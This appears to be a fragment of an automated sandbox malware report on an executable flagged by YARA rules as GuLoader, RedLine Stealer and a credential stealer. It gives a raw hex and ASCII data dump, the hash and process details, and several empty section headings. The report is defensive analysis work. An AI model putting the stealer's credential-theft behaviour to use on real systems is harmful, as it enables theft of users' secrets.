                                                                                                                                                Data Raw: 3c b8 df aa d5 24 18 4b 00 7c 20 bc 99 ab 4c bd cb dd 92 5d fb 30 6b 55 fc 10 13 eb 85 8a bd f7 3e dc 6f 1d dc 42 51 7c d2 39 2d b7 bf 40 ab fa 75 9c b4 48 eb 92 39 1c 82 89 36 23 5e 56 75 77 33 18 04 85 68 69 41 92 39 b4 cb eb 5e 8c 12 df 3f ed 01 57 e9 f0 7c e9 90 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c 54 6f c7 f1 2b f1 2d 3a 29 5e b3 ee ca 06 74 9f 76 94 8c fd af a5 4c eb 39 0a 7b 43 b3 5b ea f3 4a da 5d 94 ac 92 9c 3d 76 be 67 9b cb c1 8a ab 1b 76 ca d8 da b7 9f 8a 47 87 a8 b5 10 83 a2 9c 41 f3 ac 3f d6 ef d6 5a f9 70 d8 b3 87 db 69 ec 39 48 f3 51 44 21 89 25 ca 24 f1 07 6c 95 b1 1f 8a 73 be 4e 01 c8 c6 30 2b 2f bf 8b 39 c8 4c 09 7c e3 8c ba d3 e7 d2 9b 28 27 2c 6d e8 44 5e bf a6 5a 92 ab ac d5 54 4f f7 a5 d1 7b 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 23 4d 7b 71 5a 01 0d 72 69 ee 5d 25 c7 fd 75 f3 2d 1a f4 84 b9 8e 64 35 eb 74 eb 11 5e f2 74 52 c6 73 e9 45 30 a2 91 f8 a9 4c cc f1 1f f1 e0 a3 84 d1 aa bf 3d 02 f9 c7 ae 77 b2 86 d0 bc ab fd 9b d6 1e d7 2b 15 4b 5b a8 f4 8f 35 4d 07 67 7f 5f cc a6 42 91 d4 83 e6 38 43 98 ea 66 ca bc a1 f0 69 d1 f3 18 81 09 e3 3f ba 2c 41 8f 04 af 03 4c 2b 3d 9d a7 5c e6 d6 87 e7 f6 44 bd 04 40 28 d5 69 45 60 c3 80 00 2b 2d b0 35 a0 d6 50 a3 a2 b0 aa fc b1 65 5a aa 5f 92 77 07 22 71 fc 5d ea 08 c0 b2 58 e8 34 bf 16 51 ff ba ca dd 23 9e ba de 83 b8 1c 4c fd c3 1b f4 d0 b5 ad a3 09 d5 28 9a 8c 94 b6 75 e7 3f 7e 29 c6 a0 e3 6c 86 62 92 46 7d c8 f9 b0 a2 ad fb 2f ed b1 3a d6 e7 3a 18 35 f8 15 b7 45 b3 d8 ad 84 c0 d7 0d 27 57 8d 65 b0 71 75 5e 8d 80 82 4a a1 1e 77 c1 70 5e 62 43 1f 86 00 c7 19 3b d7 d0 70 07 b4 7b 88 29 c0 96 aa c9 4d 2c ee 30 4a 9f 52 ad 71 35 07 7f 2d c5 6d 02 a4 57 13 f9 5f 5a e5 4d 0c 70 f8 6e 5a 43 b0 84 94 f0 c5 1e b9 6b ef 07 0c 96 48 33 8d a1 56 d6 a8 2e 69 62 27 8c 76 8b 06 b0 63 8c b3 b3 72 04 a8 a8 a2 5a 80 61 d9 61 a7 5b 71 09 ba b4 92 88 0b 3d 6d 63 fc bb 22 96 39 c5 4f db fd c1 23 16 f4 80 0d 82 86 d0 01 25 03 f4 62 1c 5e ec 83 bf ea b9 14 88 40 d8 55 a3 5b 27 4e fb d5 39 34 e2 df db ea 24 85 0f 0c 2a ab 2d 9f a1 40 6e 30 41 8e 2d ce 90 74 cf d8 c7 04 dc a7 ba ac 7f 9e ab 70 5f c5 7e 01 a0 38 1e b1 fe f0 83 fc 95 cd 83 d9 69 c7 51 82 ce 1f 9f 9a ac 7b d2 fd db dd 84 a6 6b 2f 5f c3 65 15 27 4e 33 f3 58 d4 7b 14 5a 8a 2d d3 34 98 92 4f 6e 63 d0 80 c5 1c f1 c4 17 de 20 c0 08 6b ab 34 e4 c3 a6 7f 66 04 39 56 11 b2 e8 4c c7 bb ec fb 02 1c d1 87 28 59 b0 b8 2d fa 19 5d 30 7a 2a 66 ad c2 54 98 76 73 c5 48 09 88 92 23 a6 8b 62 da db 4d 86 5f 7e 42 94 85 6b 69 41 92 3d b4 cb eb a1 73 12 df 87 ed 01 57 e9 f0 7c e9 d0 c8 2b 3f 5f 69 32 39 2c 89 3c 73 4a 8b 19 e5 b6 fa ad 09 5a d5 5a 20 30 01 5f 10 89 1a f1 0d 65 b3 b7 3c b4 6f c7 f1 25 ee 97 34 29 ea ba 23 eb be 75 d3 bb b5 d8 95 c6 d6 6c 9b 4b 65 1c 31 d2 36 ca 90 2b b4 33 fb d8 b2 fe 58 56 cc 12 f5 eb a8 e4 8b 5f 39 99 f8 b7 d8 fb ef 69 8a a5 bf 34 83 a2 9c 41 f3 ac 3f be ff 52 77 d5 01 32 cd ab aa 83 92 15 39 19 2f 76 02 f6 5b f5 55 1b 79 67 22 20 61 a1 02 54 30 2d b9 2d 4e 77 5e 55 f5 0b eb 22 77 60 92 66 c4 e1 c4 bb e5 8a 56 c6 13 da 67 25 c1 8b 2b 78 d5 fe bc 37 27 db d4 3b 05 9f c1 6b 30 02 a1 19 48 39 da 2c df e1 bc 9c 27 d5 e8 52 e1 5a 01 0d 72 39 ab 5d 25 8b fc 71 f3 59 bf f4 d4 b9 8e 64 35 eb 74 eb 11 be f2 57 53 cd 72 e0 ce 74 1e 94 d5 a7 06
                                                                                                                                                Data Ascii: <$K| L]0kU>oBQ|9-@uH96#^Vuw3hiA9^?W|+?_i29,<sJZZ 0_e<To+-:)^tvL9{C[J]=vgvGA?Zpi9HQD!%$lsN0+/9L|(',mD^ZTO{k0H9,'#M{qZri]%u-d5t^tRsE0L=w+K[5Mg_B8Cfi?,AL+=\D@(iE`+-5PeZ_w"q]X4Q#L(u?~)lbF}/::5E'Wequ^Jwp^bC;p{)M,0JRq5-mW_ZMpnZCkH3V.ib'vcrZaa[q=mc"9O#%b^@U['N94$*-@n0A-tp_~8iQ{k/_e'N3X{Z-4Onc k4f9VL(Y-]0z*fTvsH#bM_~BkiA=sW|+?_i29,<sJZZ 0_e<o%4)#ulKe16+3XV_9i4A?Rw29/v[Uyg" aT0--Nw^U"w`fVg%+x7';k0H9,'RZr9]%qYd5tWSrt


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: GR8jRQeRUr.exe PID: 6416 Parent PID: 2932

                                                                                                                                                General

                                                                                                                                                Start time:08:24:56
                                                                                                                                                Start date:18/12/2021
                                                                                                                                                Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\GR8jRQeRUr.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:96104 bytes
                                                                                                                                                MD5 hash:30A35B83C44ABA13EE4EA4EE11003419
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: GR8jRQeRUr.exe PID: 6312 Parent PID: 6416

                                                                                                                                                General

                                                                                                                                                Start time:08:25:56
                                                                                                                                                Start date:18/12/2021
                                                                                                                                                Path:C:\Users\user\Desktop\GR8jRQeRUr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\GR8jRQeRUr.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:96104 bytes
                                                                                                                                                MD5 hash:30A35B83C44ABA13EE4EA4EE11003419
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >